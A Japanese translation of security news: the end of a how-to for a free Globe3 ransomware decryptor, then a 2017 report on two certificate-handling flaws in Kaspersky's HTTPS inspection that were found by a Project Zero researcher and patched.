     このプログラムが起動する時、あなたは以下に示すUAC(User Account Control、ユーザアカウント制御)が表示される。先に進むには Yes ボタンをクリックする。


    UACプロンプト

     この復号プログラムは、復号鍵を見つけるためにブルートフォース(【訳注】 総当り)を開始する。これには暫く時間がかかるので、我慢されたい。


    短い説明文

     鍵がブルートフォースで発見されると、このプログラムは、以下のような新しいウィンドウを表示する。


    発見された復号鍵

     この復号鍵でファイルの復号を開始するには、OKボタンをクリックする。そうすると使用許諾書が表示される。続けるには Yes をクリックする。これで、復号されるドライブのリストを表示している、この復号プログラムのメインスクリーンが表示される。(【訳者補注】 暗号化されているファイルが存在するにも拘わらず)そのドライブレターが表示されていない場合には、Add Folderボタンをクリックし手動で、そのドライブレターを追加しなさい。


    Globe3復号プログラムのメイン画面

     復号したい全てのフォルダを追加したら、復号プロセスを開始するためにDecryptボタンをクリックする。Decryptをクリックすると、このプログラムは、暗号化されたファイルの全てを復号し、以下のような結果を示す画面で復号状況を表示するだろう。


    ファイル復号中

     終了するとResultタブがFinishedを宣言する。あなたのファイルの全てはこれで、復号されているはずである。あなたがこの復号プログラムで作業するための支援を必要としているのであれば、我々のGlobe Ransomware Support Topicで質問しなさい。


    KasperskyのHTTPSトラフィック検査システム中に深刻なセキュリティフローが発見された
    BleepingComputer : News>Security (2017/01/04)
     Google Project Zeroの最も熟達したセキュリティ研究者の一人であるTravis Ormandyは、Kasperskyのセキュリティ製品がWebの脅威に関してHTTPSトラフィックを検査する方法中に二つの問題を特定した。
     この研究者によると、このKaspersky製品は、このシステム公認の認証ストア中の信頼される認証局(CA)として、ルート認証(Kaspersky Anti-Virus Personal Root)を使用している。
     ユーザがHTTPSを介してホストされたWebリソースにアクセスする度に、Kasperskyセキュリティ ソフトウェアは、全てのSSL接続をプロキシし、あらゆる脅威に関して入接続をスキャンするために独自の(リーフ)認証を配備している。
    このトラフィックは暗号化されたままであるが、認証はKasperskyのルート認証によって発行されているようである。

    Kasperskyセキュリティ製品は、あるユーザに関してHTTPS接続を破壊していた

     此処がOrmandyが最初の問題を発見した所である。Kasperskyはクローンされたリーフ認証用のキーとして実際の認証のMD5ハッシュ冒頭の32ビットを使用している。
     ユーザがHTTPSリソースに(再)アクセスすると、このアンチウィルスは、このMD5シグネチャを検索し、同じクローンされたリーフ認証を再使用する。
     「あなたは32ビットキーを理解する暗号解読者になる必要はない。32ビットキーでは数秒でコリジョンする(【訳注】 データのハッシュ値と同じハッシュ値を見つける)ブルートフォースを妨げるには不十分である。事実、任意の他の認証でコリジョンを生成することは些末なことである」と、昨日公開したバグレポートでOrmandyは説明している。
     現実世界の例として、Ormandyは、HackerNews(news.ycombinator.com)サイトとコネチカット州マンチェスターのポータル(manchesterct.gov)用認証の32ビットキーは同一であると発言している。
     Ormandyは、このバグが、多くのKasperskyユーザのHTTPS接続を破壊し、安全なWebサイトへのアクセスを不可能にしたり、代わりにHTTPを使用するダウングレードしたWebサイトへのアクセスを余儀なくしていたと明らかにしている。


     Ormandyが発見した二つ目のバグは、Kaspersky製品がインストールされている各コンピュータにKasperskyが追加しているルート認証の秘密鍵ファイルに関連している。
     Ormandyは、Kaspersky製品が、これらの重要なファイルを保護するために脆弱なメカニズムを使用していたと発言している。
     この研究者は、理論的には、システムへのアクセスを持つ攻撃者が、秘密鍵を変更し、信頼される認証局となり、HTTP接続をインターセプトしたり開始したりするために使用することのできるSSL認証をユーザのマシン上に配備することが可能であると、発言している。
     この二つのバグは、この秋Kasperskyのスタッフに適切に報告された。この企業は12月28日に両方のバグに関するアップデートを公開した。Kasperskyアンチウィルス ソフトウェアのユーザは必ず最新のアップデートを実行しなければならない。